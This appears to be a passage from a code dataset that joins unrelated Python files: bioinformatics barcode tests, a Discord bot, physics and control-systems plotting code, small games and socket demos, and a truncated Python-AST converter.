'TACCGTAAATGCAAATA': 1, 'GGTGACTAGCCGGTAGT': 1, 'GCAAACTGTTACATAAG': 1,\n 'CAGCCTGTCTGCGACAT': 1, 'TAAACTACCTTTGACCA': 1, 'TACATACTGATGCCCCT': 1, 'AAGTAACCAGTCGAAGA': 1,\n 'AAGTATATGGTGGTATA': 1, 'AAGAGCCGGCACGCAAC': 1, 'CACAAGCAGTCAAACAT': 1, 'CGATACCCGTAACGCGT': 1,\n 'ACCCGCCTGAGCTAACA': 1, 'TCCAGACCTTTGCGCGA': 1, 'CGTATGTATCGGCCAAG': 1, 'TAGCATGGGGGGCTGAA': 1,\n 'AACCTGAGAACCGCTCT': 1, 'AGAATCCTCAAACTATA': 1, 'GATAGCTTGATGACGCA': 1, 'ATGGACTACTGCACGCG': 1})\n print(cnter==expectedCounter)\n\ndef test_quantify_read_barcode_map_files():\n outMap = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/testMap.tsv\"\n\n barcode_2_pos, barcode_2_abundance = quantify_barcodes.quantify_read_barcode_map_files(outMap)\n with open('/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/B2P.json') as jf:\n expectedB2P = json.load(jf)\n expectedB2P = {key: tuple(val) for key, val in expectedB2P.items()}\n with open('/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/B2A.json') as jf2:\n expectedB2A = json.load(jf2)\n assert barcode_2_pos == expectedB2P\n assert barcode_2_abundance == expectedB2A\n\n\n\ndef capture(command_str):\n command = shlex.split(command_str)\n proc = subprocess.Popen(command, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,)\n out, err = proc.communicate()\n return out, err, 
proc\n\ndef to_str(bytes_or_str):\n if isinstance(bytes_or_str, bytes):\n value = bytes_or_str.decode('utf-8')\n else:\n value = bytes_or_str\n return value\n\ndef test_quantify_extract_annotated_correct():\n with open('/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/B2P.json') as jf:\n expectedB2P = json.load(jf)\n barcode_2_position = {key: tuple(val) for key, val in expectedB2P.items()}\n with open('/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/B2A.json') as jf2:\n barcode_2_abundance = Counter(json.load(jf2))\n print(barcode_2_abundance.most_common()[0:10])\n in_fq_file = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/seqData/test100.fasta\"\n cnter = quantify_barcodes.quantify_load_fq_barcodes(in_fq_file)\n max_edit_distance = 2\n expectedOutFile = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/seqData/quantifyExtract.sorted.out\"\n testOutFile = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/quantifyExtractTest.out\"\n quantify_barcodes.quantify_extract_annotated_correct(barcode_2_position, barcode_2_abundance, cnter, testOutFile, max_edit_distance)\n out, err, proc = capture(f'sort -k1 {testOutFile}')\n with open(expectedOutFile, 'r') as o:\n expectedLines = o.read()\n assert to_str(out) == expectedLines\n\n\ndef test_quantify():\n in_fq_file = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/seqData/test100.fasta\"\n map_file = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/testMap.tsv\"\n testOutFile = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/quantifyQuantOut.tsv\"\n expectedOutFile = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/seqData/quantifyExtract.sorted.out\"\n tp2 = 'GTGTATAAGAGACAG'\n bc2tp2 = 13\n bcLen = 17\n before = True\n max_edit_distance = 2\n quantify_barcodes.quantify(in_fq_file, map_file, testOutFile, tp2, bc2tp2, bcLen, before, max_edit_distance)\n out, err, proc = capture(f'sort -k1 {testOutFile}')\n with open(expectedOutFile, 'r') as o:\n expectedLines = o.read()\n assert to_str(out) == expectedLines\n\n\n","sub_path":"tests/unit/test_quantify.py","file_name":"test_quantify.py","file_ext":"py","file_size_in_byte":6531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"487639572","text":"class Solution:\n def maxCount(self, m, n, ops):\n \"\"\"\n :type m: int\n :type n: int\n :type ops: List[List[int]]\n :rtype: int\n \"\"\"\n if len(ops) > 0:\n return min([l[0] for l in ops])*min([l[1] for l in ops])\n else:\n return m*n\n\n def maxCount2(self, m, n, ops):\n if len(ops) > 0:\n setA, setB = zip(*ops)\n return min(setA) * min(setB)\n else:\n return m*n\n\nprint(Solution().maxCount2(3,3,[[2,2],[3,3]]))","sub_path":"maxCount.py","file_name":"maxCount.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"296887115","text":"import discord\nimport os\nimport requests\nimport json\nimport random\nfrom replit import db\nfrom keep_alive import keep_alive\n\nclient = discord.Client()\n\nreply_words = [\"ok\", \"Ok\", \"pong\", \"Pong\", \"test\", \"Test\"]\n\nstarter_replies = [\"ok\", \"why\", \"no\"]\n\nif \"responding\" not in db.keys():\n db[\"responding\"] = True\n\n\ndef get_quote():\n response = requests.get(\"https://zenquotes.io/api/random\")\n json_data = json.loads(response.text)\n quote = json_data[0]['q'] + \" -\" + json_data[0]['a']\n return (quote)\n\n\ndef update_replies(reply_message):\n if \"replies\" in db.keys():\n 
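maxCount works because each op increments the whole rectangle [0, a) x [0, b), so the cells touched by every op form the rectangle bounded by the smallest a and the smallest b; a quick check of that argument on the example input:

ops = [[2, 2], [3, 3]]
rows = min(a for a, b in ops)   # 2
cols = min(b for a, b in ops)   # 2
assert rows * cols == 4         # matches Solution().maxCount(3, 3, ops)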
replies = db[\"replies\"]\n replies.append(reply_message)\n db[\"replies\"] = replies\n else:\n db[\"replies\"] = [reply_message]\n\n\ndef delete_reply(index):\n replies = db[\"replies\"]\n if len(replies) > index:\n del replies[index]\n db[\"replies\"] = replies\n\n\n@client.event\nasync def on_ready():\n print('Logged in as {0.user}'.format(client))\n\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n\n msg = message.content\n\n if message.content.startswith('$ping'):\n await message.channel.send('Pong!')\n\n if message.content.startswith('$inspire'):\n quote = get_quote()\n await message.channel.send(quote)\n\n if db[\"responding\"]:\n options = starter_replies\n if \"replies\" in db.keys():\n options = options + db[\"replies\"]\n\n if any(word in msg for word in reply_words):\n await message.channel.send(random.choice(options))\n\n if msg.startswith(\"$newreply\"):\n reply_message = msg.split(\"$newreply \", 1)[1]\n update_replies(reply_message)\n await message.channel.send(\"New reply added!\")\n\n if msg.startswith(\"$delreply\"):\n replies = []\n if \"replies\" in db.keys():\n index = int(msg.split(\"$delreply\", 1)[1])\n delete_reply(index)\n replies = db[\"replies\"]\n await message.channel.send(replies)\n\n if msg.startswith(\"$listreplies\"):\n replies = []\n if \"replies\" in db.keys():\n replies = db[\"replies\"]\n await message.channel.send(replies)\n\n if msg.startswith(\"$responding\"):\n value = msg.split(\"$responding \", 1)[1]\n\n if value.lower() == \"true\":\n db[\"responding\"] = True\n await message.channel.send(\"Responding is on.\")\n else:\n db[\"responding\"] = False\n await message.channel.send(\"Responding is off.\")\n if msg.startswith(\"yeet\"):\n await message.channel.send(\"https://tenor.com/bf63y.gif\")\n\nkeep_alive()\nclient.run(os.getenv('TOKEN'))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"648313398","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy\nfrom dataclasses import dataclass\nfrom PyMieSim.polarization import LinearPolarization, JonesVector\n\n\n@dataclass\nclass PlaneWave():\n \"\"\"\n .. note::\n Class representing plane wave beam as a light source for\n light scattering.\n \"\"\"\n wavelength: float\n \"\"\" Wavelenght of the light field. \"\"\"\n polarization: float = 0\n \"\"\" Polarization of the light field in degree. \"\"\"\n amplitude: float = 1\n \"\"\" Maximal value of the electric field at focus point. 
\"\"\"\n\n    def __post_init__(self):\n        self.k = 2 * numpy.pi / self.wavelength\n        self.amplitude = numpy.atleast_1d(self.amplitude).astype(float)\n        self.wavelength = numpy.atleast_1d(self.wavelength).astype(float)\n\n        if not isinstance(self.polarization, JonesVector):\n            polarization = numpy.atleast_1d(self.polarization).astype(float)\n            self.polarization = LinearPolarization(*polarization)\n","sub_path":"PyMieSim/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"651266049","text":"import pygame\nfrom towers.tower import Pcr, RapidTest, Alcohol\n\n\n\nclass TowerBuilder:\n    def __init__(self, x, y, image, name, market_price):\n        self.x = x\n        self.y = y\n        self.image = image\n        self.width = self.image.get_width()\n        self.height = self.image.get_height()\n        self.name = name\n        self.market_price = market_price\n\n    def draw(self, win):\n        win.blit(self.image, (self.x - self.width//2, self.y - self.height//2))\n\n    def build(self, money, x, y):\n        \"\"\"\n        if the money is enough to build a tower, build the tower and pay for it\n        :param money: int\n        :return: (int, tower object or None, notice string or None)\n        \"\"\"\n        notice = None\n        if money > self.market_price:\n            if self.name == \"alcohol\":\n                built_item = Alcohol(x, y, self.name)\n            elif self.name == \"rapid test\":\n                built_item = RapidTest(x, y, self.name)\n            else:\n                built_item = Pcr(x, y, self.name)\n\n            notice = f\"Pay {self.market_price} for {self.name}\"\n            return money - self.market_price, built_item, notice\n        return money, None, notice\n\n\nclass VacantLot:\n    def __init__(self, x, y):\n        self.x = x\n        self.y = y\n        self.width = 30\n        self.height = 30\n        self.image = pygame.transform.scale(pygame.image.load(\"towers/tower_images/vacant_lot.png\"), (self.width, self.height))\n\n    def in_range(self, building):\n        if self.x - self.width//2 < building.x < self.x + self.width//2 \\\n                and self.y - self.height//2 < building.y < self.y + self.height//2:\n            return True\n        return False\n\n    def draw(self, win):\n        win.blit(self.image, (self.x-self.width//2, self.y-self.height//2))","sub_path":"towers/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"61531182","text":"\"\"\"\nUDP socket demo: client\nkey code\n\"\"\"\nfrom socket import *\n\n# set the server address\nADDR = ('127.0.0.1',8888)\n\n# create the socket\nudp_socket = socket(AF_INET,SOCK_DGRAM)\n\n\n# send and receive messages in a loop\nwhile True:\n    msg = input(\">>\")\n    # break on an empty string\n    if not msg:\n        break\n    udp_socket.sendto(msg.encode(),ADDR)\n    # client shutdown\n    # if msg == \"##\":\n    #     break\n    data,addr = udp_socket.recvfrom(1024)\n    print(\"From server:\",data.decode())\n\nudp_socket.close()\n\n\n","sub_path":"month_02/teacher/day11/udp_client.py","file_name":"udp_client.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"330548630","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nfrom sklearn.metrics import confusion_matrix\n\nfrom ..common.utils import dict_itemgetter\nfrom .constants import (\n    FIGURE_SIZE,\n    FONT_SIZE,\n    NUMERIC_FORMAT,\n)\nfrom .utils import save_plot\n\n\ndef get_named_cm(true_labels, pred_labels, norm_axis=None):\n    cm = confusion_matrix(true_labels, pred_labels).astype(float)\n    cm_name = 'count'\n    if norm_axis is not None:\n        norm_cm = 
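The UDP client above expects a peer listening on 127.0.0.1:8888; a minimal echo-server sketch it could talk to (the bind address and the uppercase echo are assumptions made for the demo, not part of the original lesson):

from socket import socket, AF_INET, SOCK_DGRAM

ADDR = ("127.0.0.1", 8888)          # must match the client's ADDR

server = socket(AF_INET, SOCK_DGRAM)
server.bind(ADDR)
while True:
    data, client = server.recvfrom(1024)
    if not data:
        continue
    # echo the message back, uppercased, to whoever sent it
    server.sendto(data.decode().upper().encode(), client)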
cm.sum(axis=norm_axis, keepdims=True)\n norm_cm[norm_cm < 1e-10] = 1.\n cm /= norm_cm\n cm_name = 'precision' if norm_axis == 0 else 'recall'\n return cm, cm_name\n\n\ndef plot_cm(\n true_labels, pred_labels,\n labels_names=None,\n norm_axis=None,\n figsize=FIGURE_SIZE,\n save_path=None,\n need_show=True,\n **kwargs\n):\n \"\"\"\n Plot confusion matrix.\n :param true_labels: ndarray of int\n True objects' classes.\n :param pred_labels: ndarray of int\n Predicted classes (not just probabilities!).\n :param labels_names: ndarray\n Classes names. If None, unique labels are used.\n :param norm_axis: int\n Index of the axis to normalize matrix elements.\n If None, confusion matrix counts are preserved.\n :param figsize: tuple of int\n Param figsize of function pyplot.figure\n :param save_path: str\n Path to the file to save image to. If empty, image is not saved.\n :param need_show: bool\n Indicates whether pyplot.show should be called.\n :param kwargs:\n Keyword arguments for seaborn.heatmap function. Possible arguments:\n annot: bool\n If True, write the data value in each cell.\n If an array-like with the same shape as data,\n then use this to annotate the heatmap instead of the raw data.\n cmap: matplotlib colormap name or object, or list of colors\n The mapping from data values to color space.\n If not provided, the default will depend on whether center is set.\n fmt: str\n String formatting code to use when adding annotations.\n annot_kws: dict\n Keyword arguments for ax.text when annot is True.\n # annot_kws={\"size\": font_size}\n :return:\n \"\"\"\n cm, cm_name = get_named_cm(true_labels, pred_labels, norm_axis)\n tick_labels = labels_names or sorted(map(str, set(true_labels)))\n font_size = dict_itemgetter('size')(dict_itemgetter('annot_kws')(kwargs)) or FONT_SIZE\n\n plt.figure(figsize=figsize)\n ax = sns.heatmap(cm, **kwargs)\n ax.set_yticklabels(\n map(lambda x: 'true ' + x, tick_labels),\n rotation=0, fontdict={'fontsize': font_size}\n )\n ax.set_xticklabels(\n tick_labels,\n rotation=90, fontdict={'fontsize': font_size}\n )\n plt.title('Mean {}: {:.5f}'.format(cm_name, cm.diagonal().mean()))\n\n save_plot(save_path)\n\n if need_show:\n plt.show()\n\n\ndef color_pandas_correlation(dataframe, columns, cmap, num_format=None):\n \"\"\"\n Computes correlation table from the given dataframe columns and returns its colorized version.\n :param dataframe: pandas.DataFrame\n :param columns: list of str\n Columns to use for correlation computing.\n :param cmap: matplotlib colormap name or object, or list of colors\n :param num_format: str\n Numeric format to use.\n :return: pandas.DataFrame\n Colorized correlation table.\n \"\"\"\n correlation_table = dataframe[columns].corr()\n return (\n correlation_table.style\n .background_gradient(cmap=cmap)\n .format(num_format or NUMERIC_FORMAT)\n )\n\n\ndef plot_labels_distribution(labels, save_path=None, need_show=True):\n \"\"\"\n Plots barplot with unique labels count.\n :param labels: ndarray of int\n :param save_path: str\n Path to the file to save image to. 
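The norm_axis convention in get_named_cm (axis 0 yields per-predicted-class precision, axis 1 per-true-class recall) can be verified on a toy confusion matrix:

import numpy as np

cm = np.array([[8., 2.],
               [1., 9.]])   # rows = true class, columns = predicted class

precision = cm / cm.sum(axis=0, keepdims=True)   # each column sums to 1
recall = cm / cm.sum(axis=1, keepdims=True)      # each row sums to 1

print(precision.diagonal())   # [8/9, 9/11]
print(recall.diagonal())      # [0.8, 0.9]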
If empty, image is not saved.\n :param need_show: bool\n Indicates whether pyplot.show should be called.\n \"\"\"\n unique_classes, unique_count = np.unique(labels, return_counts=True)\n\n plt.bar(unique_classes, unique_count, color='b', alpha=0.5)\n\n plt.title('{} classes distribution'.format(len(unique_classes)))\n plt.xlabel('label')\n plt.ylabel('count')\n\n save_plot(save_path)\n\n if need_show:\n plt.show()\n","sub_path":"visual/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"98873415","text":"# native dependenices\nimport sys\nimport os\nimport decorator\n\n# UI dependencies\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.uic import loadUi\n\n# math dependencies\nimport control as c\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pymbolic as pmbl\n\n# encoder dependencies\nimport imageio\n\nglobal G_s, D_s\n\n\n\n\"\"\"\nAction center, all actions called from gui. \n\"\"\"\n\n\"\"\"\nSym2transfer converts G_s, D_s into a single T_s, then uses algebraic expansion to return a matrix with coefficients\non each order Availability up to 16th order s polynomial. Matrix is then inputted into get_T which calls from the \ncontrols library \n\"\"\"\n\n\ndef sym2transfer(G_s, D_s):\n # inputted as string\n def as_cof(expr):\n\n # string manipulation\n\n # if a negative is in there, pole/zero in RHP, unstable\n if \"-\" in expr:\n return \"Unstable\"\n\n # up to 16th order polynomial\n cof_mat = [0] * 16\n\n # getting rid of white spaces,\n expr_list = expr.replace(\" \", \"\").split(\"+\")\n # cof_list not organized, splitting be the cof and the n order\n # transfer functions like the cofs in reverse\n for n in expr_list:\n # any order greater than 1 represented with **, doing a check for s**1 and s**0 (s and simple cof)\n if \"**\" not in n:\n # if just s\n if n == \"s\":\n cof_mat[-2] = 1\n # cof\n if \"s\" not in n:\n cof_mat[-1] = float(n)\n\n # even if s passing for some reason, fixed\n elif len(n) > 1:\n # to the left of the * sign\n cof = float(n.split(\"*\")[0])\n cof_mat[-2] = float(cof)\n\n # checking for s**n where n>1\n if \"**\" in n:\n # adding a negative sign to order, reverse assigning in cof_mat. 
adding 1 space for negative indexing\n order = int(\"-\" + n.split(\"**\")[1]) - 1\n # cof always appears to the left of *, taking first instance\n # if no cof then first instance will be s, checking and defaulting to 1 if case\n first = n.split(\"*\")[0]\n if first == \"s\":\n cof_mat[order] = 1\n else:\n cof_mat[order] = float(first)\n\n return cof_mat\n\n def get_T(G_s, D_s):\n # applying D_s to G_s, initializing resultant T_s\n T_s = [\"(\" + G_s[0] + ')*(' + D_s[0] + \")\", \"(\" + G_s[1] + ')*(' + D_s[1] + \")\"]\n # init T\n T = {}\n # init s symbol\n s = pmbl.var(\"s\")\n\n # evaluating string :\n\n # finding isolated s powers, pymbolic sucks RIP sympy\n def get_iso_s(expr):\n s = pmbl.var(\"s\")\n\n # checking if multiplication\n if \"*\" not in expr:\n return str(expr)\n\n # checking if power of s\n for x in range(2, 9):\n if expr == \"s**\" + str(x):\n return expr\n\n # if s just return s\n if expr != \"s\":\n\n # coeff\n if \"s\" not in expr:\n return str(expr)\n\n # get the children of the object, should be Variable(\"s\")\n child_list = list(pmbl.expand(eval(expr)).children)\n\n # count s occ\n expr_list = [str(x) for x in child_list]\n\n # get order\n iso_s_order = expr_list.count('s')\n\n expr_list = [str(x) for x in expr_list if x != \"s\"]\n\n if iso_s_order > 0:\n # if no coefficient example (s*s)\n if iso_s_order == len(child_list):\n expr = \"s**\" + str(iso_s_order)\n # if coefficient example (2*s*s)\n else:\n expr = \"*\".join(expr_list) + \"*(s**\" + str(iso_s_order) + \")\"\n\n expr = str(pmbl.expand(eval(expr)))\n return expr\n\n num_expr = pmbl.expand(eval(T_s[0]))\n den_expr = pmbl.expand(eval(T_s[1]))\n\n # expanding itself 3 times, JUST IN CASE, sometimes expanding once throws a fit\n for n in range(3):\n num_expr = pmbl.expand(num_expr)\n den_expr = pmbl.expand(den_expr)\n\n # expand to get isolated s\n num_expr = get_iso_s(str(num_expr))\n den_expr = get_iso_s(str(den_expr))\n\n # expanding one last time JUST IN CASE\n num_expr = pmbl.expand(eval(num_expr))\n den_expr = pmbl.expand(eval(den_expr))\n\n # get coefficients from expanded polynomial\n T['num'] = as_cof(str(num_expr))\n T['den'] = as_cof(str(den_expr))\n\n transfer = c.tf(T['num'], T['den'])\n return transfer\n\n # execute\n T = get_T(G_s, D_s)\n\n return T\n\n\n\"\"\"\nstep_plotter takes a transfer function and a max time variable and displays the step response, max velocity, and \nmax acceleration. Returns a step info dictionary called info. 
info is later called from GUI to display into step\ninfo table \n\"\"\"\n\n\n# root function is the plotter function\ndef step_plotter(G_s,D_s, max_t,cssv=-1):\n\n T_s = [\"(\" + G_s[0] + ')*(' + D_s[0] + \")\", \"(\" + G_s[1] + ')*(' + D_s[1] + \")\"]\n\n if cssv != -1:\n s = 0\n #getting current ssv, lim s->0 of T_s\n ssv = eval(T_s[0])/eval(T_s[1])\n\n k = cssv/ssv\n\n #applying k to G_s[0], doesnt matter\n G_s[0] = str(k)+\"*\"+G_s[0]\n transfer = sym2transfer(G_s,D_s)\n\n else:\n\n transfer = sym2transfer(G_s,D_s)\n\n # defining time, 1000 discrete steps\n t = np.linspace(0, max_t, 1000)\n # returns numpy array\n\n\n sr = c.step_response(transfer, t)\n # parsing array\n y = sr[1]\n\n # getting velocity\n dy = []\n time_step = t[1] - t[0]\n for n in range(999):\n dy.append((y[n + 1] - y[n]) / time_step)\n\n # getting acceleration\n ddy = []\n for n in range(998):\n ddy.append((dy[n + 1] - dy[n]) / time_step)\n\n # getting step info\n info = c.step_info(transfer)\n OS = round(info['Overshoot'], 3)\n Ts = round(info['SettlingTime'], 3)\n SSv = round(info['SteadyStateValue'], 3)\n peak = round(info['Peak'], 3)\n max_v = round(max(dy), 4)\n max_a = round(max(ddy), 4)\n\n # plotting displacement over time to step response\n plt.subplot(2, 1, 1)\n plt.plot(t, y)\n plt.ylabel(\"Displacement\")\n plt.xlim([0, max_t])\n\n # drawing Ts line\n plt.axvline(info['SettlingTime'], linewidth=1, linestyle='--', color='b')\n # drawing peak line\n plt.axhline(info['Peak'], linewidth=1, linestyle='--', color='g')\n # drawing SSv line\n plt.axhline(info['SteadyStateValue'], linewidth=1, linestyle='--', color='r')\n\n plt.title(\"OS: \" + str(OS) + \" | Ts: \" + str(Ts) + '\\n' + 'SSv: ' + str(SSv) + ' | Peak: ' + str(\n peak) + '\\n' + \"Max Velocity: \" + str(max_v) + ' | Max Acceleration: ' + str(max_a))\n plt.grid(True)\n\n # plotting velocity\n plt.subplot(4, 1, 3)\n plt.plot(t[:999], dy, \"y\")\n # drawing max v line\n plt.axhline(max(dy), linewidth=1, linestyle='--', color='g')\n plt.grid(True)\n plt.ylabel(\"Velocity\")\n plt.xlim([0, max_t])\n\n # plotting acceleration\n plt.subplot(4, 1, 4)\n plt.plot(t[:998], ddy, 'r')\n plt.ylabel(\"Acceleration\")\n # drawing max v line\n plt.axhline(max(ddy), linewidth=1, linestyle='--', color='g')\n plt.grid(True)\n plt.xlim([0, max_t])\n plt.xlabel('Time')\n\n # plt should be init, showing within class structure of ui, update stepinfo fields first\n\n # rounding info dictionary\n for key in info.keys():\n info[key] = round(info[key], 4)\n\n # adding max v and max a\n info['MaxVelocity'] = round(max(dy), 4)\n info['MaxAcceleration'] = round(max(ddy), 4)\n\n return info\n\n\nG_s = [\"1\",\"1\"]\nD_s = [\"(240*s)+400\",\"(s**4)+(12*(s**3))+(72*(s**2))+(240*s)+400\"]\n\nmax_t = 5\nT = sym2transfer(G_s, D_s)\nstep_plotter(G_s,D_s,max_t,6)\nplt.show()\n","sub_path":"step_testssv.py","file_name":"step_testssv.py","file_ext":"py","file_size_in_byte":8067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"407048982","text":"import argparse\nfrom json import loads\nfrom os import listdir, mkdir\nfrom os.path import isdir, join\nfrom shutil import copy\n\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\n\n\ndef read_and_split_data(data_folder):\n truths_file_path = join(data_folder, 'truth.jsonl')\n\n def get_id_and_class(truth_row):\n truth_row = loads(truth_row)\n return [truth_row['id'], truth_row['truthClass']]\n\n with open(truths_file_path, 'r') as 
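The string-expansion pipeline in step_testssv.py ultimately just hands coefficient lists to control.tf; when the polynomials are already known, the same step metrics come straight from the library (a generic second-order system chosen for illustration, not the script's plant):

import control as c
import numpy as np

# T(s) = 400 / (s^2 + 12 s + 400): coefficient lists, highest order first
T = c.tf([400], [1, 12, 400])

t = np.linspace(0, 5, 1000)
_, y = c.step_response(T, t)
print(c.step_info(T))   # overshoot, settling time, peak, steady-state value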
truths_file:\n truth_class_per_instance = np.array(\n list(map(get_id_and_class, truths_file)))\n\n ids, classes = truth_class_per_instance[:,\n 0], truth_class_per_instance[:, 1]\n \n\n return ids, []\n\n\ndef split_and_store_data(train_ids, test_ids, data_folder, output_train_folder, output_test_folder):\n input_instances_file_path = join(data_folder, 'instances.jsonl')\n input_truths_file_path = join(data_folder, 'truth.jsonl')\n\n if not isdir(output_train_folder):\n mkdir(output_train_folder)\n\n if not isdir(output_test_folder):\n mkdir(output_test_folder)\n\n output_train_instances_file_path = join(\n output_train_folder, 'instances.jsonl')\n output_test_instances_file_path = join(\n output_test_folder, 'instances.jsonl')\n\n output_train_truths_file_path = join(output_train_folder, 'truth.jsonl')\n output_test_truths_file_path = join(output_test_folder, 'truth.jsonl')\n\n store_sampled_data(train_ids, input_instances_file_path,\n output_train_instances_file_path, check_for_images=True)\n store_sampled_data(train_ids, input_truths_file_path,\n output_train_truths_file_path)\n\n store_sampled_data(test_ids, input_instances_file_path,\n output_test_instances_file_path, check_for_images=True)\n store_sampled_data(test_ids, input_truths_file_path,\n output_test_truths_file_path)\n\n\ndef store_sampled_data(ids, input_path, output_path, check_for_images=False):\n with open(input_path, 'r', encoding=\"utf8\") as input_file, open(output_path, 'w', encoding=\"utf8\") as output_file:\n for line in input_file:\n line_as_dict = loads(line)\n if line_as_dict['id'] in ids:\n if check_for_images and not line_as_dict['postMedia']:\n continue\n output_file.write(line)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--data-folder', help=\"Folder containing data we want to sample from\")\n parser.add_argument('--output-train-folder',\n help=\"Folder containing training data we acquired by sampling\")\n parser.add_argument('--output-test-folder',\n help=\"Folder containing test data we acquired by sampling\")\n args = parser.parse_args()\n\n train_ids, test_ids = read_and_split_data(args.data_folder)\n split_and_store_data(train_ids, test_ids, args.data_folder,\n args.output_train_folder, args.output_test_folder)\n","sub_path":"filter_instances_on_images.py","file_name":"filter_instances_on_images.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"366644203","text":"\"\"\"from itertools import combinations\n\nt = int(input())\n\nfor tr in range(t):\n n = int(input())\n arr = list(map(int, input().split()))\n cnt = []\n for i in range(n+1):\n a = list(map(list,combinations(arr,i)))\n for j in a:\n if not j:\n cnt.append(0)\n if sum(j) not in cnt:\n cnt.append(sum(j))\n print('#%d' %(tr+1),len(cnt))\"\"\"\n\n\nimport sys\nsys.stdin = open('input.txt')\n\nt = int(input())\n\nfor tr in range(t):\n n = int(input())\n\n arr = list(map(int, input().split()))\n arr.sort()\n a = [0]*(sum(arr)+1)\n visit = [0]\n a[0] = 1\n for i in arr:\n for j in visit[:]:\n if not a[i+j]:\n a[i+j] = 1\n visit.append(i+j)\n print('#%d' %(tr+1),sum(a))","sub_path":"python daily coding/2020.7.06 (SW Expert Academy)/3752번 (가능한 시험 점수).py","file_name":"3752번 (가능한 시험 점수).py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"438887419","text":"print(\"Copy all files from first directory into 
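The boolean-array trick in the SWEA solution has a direct set-based equivalent: fold each value over the set of sums already reachable. A compact version of the same idea (the test values are arbitrary):

def reachable_sums(values):
    sums = {0}
    for v in values:
        sums |= {s + v for s in sums}
    return sums

assert len(reachable_sums([1, 2, 3])) == 7   # {0, 1, 2, 3, 4, 5, 6}, counting 0 like the array version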
second directory. Second directory should be created at run time\")\nimport os\nfrom sys import argv\nimport shutil\n\n\ndef Creat_Cpy_DIR(dir1, dir2):\n    access_rights = 0o777\n    # abspath is a no-op for already-absolute paths, so both relative\n    # and absolute source directories are handled the same way\n    path = os.path.abspath(dir1)\n    exists = os.path.isdir(path)\n\n    path2 = os.path.abspath(dir2)\n    # create the destination directory at run time if it does not exist yet\n    if not os.path.isdir(path2):\n        os.mkdir(path2, access_rights)\n\n    if exists:\n        for data in os.listdir(path):\n            print(\"Current folder is:\" + data)\n            d1 = os.path.join(path, data)\n            d2 = os.path.join(path2, data)\n            if os.path.isdir(d1):\n                shutil.copytree(d1, d2)\n            else:\n                shutil.copy2(d1, d2)\n    else:\n        print(\"Invalid Path\")\n\ndef main():\n    # the script name plus two directories -> exactly three arguments\n    if len(argv) != 3:\n        print(\"Error : Invalid number of arguments\")\n        return\n    print(\"File name\", argv[1])\n    try:\n        Creat_Cpy_DIR(argv[1], argv[2])\n    except Exception:\n        print(\"Error : Invalid input\")\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"Assignment10_3.py","file_name":"Assignment10_3.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"574975343","text":"import ast as python_ast\nfrom typing import List\n\nimport nl2prog.language.ast as ast\nfrom nl2prog.language.python import PythonAST\nfrom .utils import is_builtin_type\n\n\ndef base_ast_type(node: PythonAST):\n    \"\"\"\n    Return the base type of the AST\n    \"\"\"\n    base_types = set([\n        python_ast.mod, python_ast.stmt, python_ast.expr,\n        python_ast.expr_context, python_ast.slice, python_ast.boolop,\n        python_ast.operator, python_ast.unaryop, python_ast.cmpop,\n        python_ast.comprehension, python_ast.excepthandler,\n        python_ast.arguments, python_ast.arg, python_ast.keyword,\n        python_ast.alias, python_ast.withitem\n    ])\n    for base in base_types:\n        if isinstance(node, base):\n            return base\n    return type(node)\n\n\ndef to_ast(target: PythonAST) -> ast.AST:\n    \"\"\"\n    Return the AST corresponding to the Python AST\n\n    Parameters\n    ----------\n    target: PythonAST\n        The Python AST to be converted\n\n    Returns\n    -------\n    ast.AST\n        The corresponding AST\n    \"\"\"\n    type_name = type(target).__name__\n    fields: List[ast.Field] = []\n\n    if 